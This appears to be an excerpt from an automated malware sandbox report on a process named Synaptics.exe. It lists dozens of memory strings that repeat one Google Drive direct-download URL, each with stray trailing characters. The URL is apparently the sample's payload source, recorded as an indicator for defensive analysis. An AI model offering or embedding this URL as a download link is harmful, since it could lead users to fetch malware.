                                Source: Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadetle/
                                Source: Synaptics.exe, 00000008.00000002.2977437745.00000000075A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadetle0
                                Source: Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadetleD
                                Source: Synaptics.exe, 00000008.00000002.2996806587.000000000F2F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadetleI
                                Source: Synaptics.exe, 00000008.00000002.2993630740.000000000F15A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadetleb
                                Source: Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadetlen
                                Source: Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadetlen2
                                Source: Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadetlenH
                                Source: Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadetlenN
                                Source: Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadetleng
                                Source: Synaptics.exe, 00000008.00000002.2996806587.000000000F2F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadetlenr
                                Source: Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadetlep
                                Source: Synaptics.exe, 00000008.00000003.2026465506.000000000085F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3037494502.000000001E67E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3026948885.000000001E1AD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3023051475.000000001E000000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000003.1985815535.0000000000857000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3030599006.000000001E35C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3028287067.000000001E232000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadf
                                Source: Synaptics.exe, 00000008.00000002.3023051475.000000001E000000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadfA
                                Source: Synaptics.exe, 00000008.00000002.3029665397.000000001E302000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadfo
                                Source: Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2993630740.000000000F15A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2963458232.000000000080C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3030599006.000000001E35C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadg
                                Source: Synaptics.exe, 00000008.00000002.3026948885.000000001E1AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadg-
                                Source: Synaptics.exe, 00000008.00000002.3026948885.000000001E1AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadg7
                                Source: Synaptics.exe, 00000008.00000002.2977437745.00000000075A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgle-a
                                Source: Synaptics.exe, 00000008.00000003.2026465506.0000000000837000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2963458232.0000000000837000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgo
                                Source: Synaptics.exe, 00000008.00000003.2026465506.0000000000837000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2963458232.0000000000837000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000003.1985815535.000000000082E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgs
                                Source: Synaptics.exe, 00000008.00000002.3037494502.000000001E67E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2970209695.00000000052DC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3026948885.000000001E1AD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3023051475.000000001E000000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3104595934.000000003DC36000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2970209695.0000000005385000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3029665397.000000001E302000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2992205633.000000000F0B4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3030599006.000000001E35C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3028287067.000000001E232000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadh
                                Source: Synaptics.exe, 00000008.00000002.2970209695.0000000005385000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadh-E
                                Source: Synaptics.exe, 00000008.00000002.2963458232.0000000000837000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadhW
                                Source: Synaptics.exe, 00000008.00000002.2970209695.00000000052DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadhe~
                                Source: Synaptics.exe, 00000008.00000002.3023051475.000000001E000000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadhromeF
                                Source: Synaptics.exe, 00000008.00000002.3023051475.000000001E000000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadhts-cn.net
                                Source: Synaptics.exe, 00000008.00000002.3080344840.0000000035B7E000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadhw
                                Source: Synaptics.exe, 00000008.00000002.2996469826.000000000F268000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3037494502.000000001E67E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3026948885.000000001E1AD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3023051475.000000001E000000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2977437745.00000000075A9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2970209695.0000000005385000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2963458232.000000000080C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3030599006.000000001E35C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadi
                                Source: Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadied
                                Source: Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloading
                                Source: Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloading.
                                Source: Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadiyor
                                Source: Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2993630740.000000000F15A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2996806587.000000000F2F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadiyor.
                                Source: Synaptics.exe, 00000008.00000002.2993630740.000000000F15A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadiyor.y
                                Source: Synaptics.exe, 00000008.00000003.2026465506.0000000000837000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2963458232.0000000000837000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000003.1985815535.000000000082E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadiz
                                Source: Synaptics.exe, 00000008.00000003.2026465506.0000000000837000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2963458232.0000000000837000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadphJ
                                Source: Synaptics.exe, 00000008.00000002.2970209695.0000000005385000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadpi
                                Source: Synaptics.exe, 00000008.00000002.2970209695.0000000005385000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadpp
                                Source: Synaptics.exe, 00000008.00000002.2996469826.000000000F268000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2977437745.0000000007663000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3037494502.000000001E67E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3026948885.000000001E1AD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2993630740.000000000F15A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2970209695.00000000052B0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2963458232.000000000080C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2992205633.000000000F0B4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3030599006.000000001E35C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3028287067.000000001E232000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadq
                                Source: Synaptics.exe, 00000008.00000003.2026465506.000000000085F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3037494502.000000001E67E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3023051475.000000001E000000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2991135395.000000000F014000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2963458232.0000000000863000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2963458232.000000000080C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000003.1985815535.0000000000857000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3030599006.000000001E35C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadr
                                Source: Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2996806587.000000000F2F8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000003.2026465506.0000000000841000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2992205633.000000000F0B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadr...
                                Source: Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadr...#
                                Source: Synaptics.exe, 00000008.00000002.2993630740.000000000F15A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadr...%
                                Source: Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadr...3
                                Source: Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadr...Y
                                Source: Synaptics.exe, 00000008.00000002.3026948885.000000001E1AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrd
                                Source: Synaptics.exe, 00000008.00000002.2970209695.00000000052B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrigi
                                Source: Synaptics.exe, 00000008.00000003.2026465506.0000000000837000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2963458232.0000000000837000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadro
                                Source: Synaptics.exe, 00000008.00000002.2970209695.0000000005385000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrsA
                                Source: Synaptics.exe, 00000008.00000002.2970209695.0000000005385000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrv-
                                Source: Synaptics.exe, 00000008.00000002.3084008214.00000000380FE000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrw
                                Source: Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000003.2026465506.0000000000841000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000003.1985815535.0000000000857000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2992205633.000000000F0B4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3030599006.000000001E35C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2963458232.000000000085B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3028287067.000000001E232000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloads
                                Source: Synaptics.exe, 00000008.00000002.3023051475.000000001E000000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloads.gooS
                                Source: Synaptics.exe, 00000008.00000002.3026948885.000000001E1AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloads/
                                Source: Synaptics.exe, 00000008.00000002.3026948885.000000001E1AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloads1
                                Source: Synaptics.exe, 00000008.00000002.3026948885.000000001E1AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloads4
                                Source: Synaptics.exe, 00000008.00000003.2026465506.0000000000837000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2963458232.0000000000837000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2963458232.000000000085B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadse
                                Source: Synaptics.exe, 00000008.00000002.2970209695.00000000052B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadserc:
                                Source: Synaptics.exe, 00000008.00000002.2977437745.00000000075A9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2996806587.000000000F2F8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2992205633.000000000F0B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadsers
                                Source: Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadsolvI
                                Source: Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadsolvi
                                Source: Synaptics.exe, 00000008.00000002.2970209695.0000000005385000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2991135395.000000000F014000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3029665397.000000001E302000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2996806587.000000000F2F8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2970209695.00000000052B0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2992205633.000000000F0B4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3030599006.000000001E35C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadt
                                Source: Synaptics.exe, 00000008.00000002.2970209695.0000000005385000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadt.
                                Source: Synaptics.exe, 00000008.00000002.2977437745.00000000075A9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2993630740.000000000F15A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadthe
                                Source: Synaptics.exe, 00000008.00000002.3029665397.000000001E302000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadti4
                                Source: Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadting.
                                Source: Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadting.3
                                Source: Synaptics.exe, 00000008.00000003.2026465506.0000000000837000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2963458232.0000000000837000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtiv
                                Source: Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2993630740.000000000F15A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtlen
                                Source: Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2977437745.00000000075A9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2993630740.000000000F15A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2996806587.000000000F2F8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2992205633.000000000F0B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtleni
                                Source: Synaptics.exe, 00000008.00000002.2993630740.000000000F15A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtleniV
                                Source: Synaptics.exe, 00000008.00000002.2996806587.000000000F2F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtlenib
                                Source: Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtleni~
                                Source: Synaptics.exe, 00000008.00000002.2977437745.00000000075A9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2996806587.000000000F2F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtnam
                                Source: Synaptics.exe, 00000008.00000002.2993630740.000000000F15A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtnam-
                                Source: Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtname
                                Source: Synaptics.exe, 00000008.00000002.2970209695.00000000052DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadty
                                Source: Synaptics.exe, 00000008.00000002.3037494502.000000001E67E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3026948885.000000001E1AD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3023051475.000000001E000000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2977437745.00000000075A9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3102248481.000000003DB63000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2992205633.000000000F0B4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3030599006.000000001E35C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3028287067.000000001E232000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadu
                                Source: Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaduld.j
                                Source: Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadunamaA
                                Source: Synaptics.exe, 00000008.00000003.2026465506.0000000000837000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2963458232.0000000000837000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadurN
                                Source: Synaptics.exe, 00000008.00000002.3023051475.000000001E000000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadurce.P
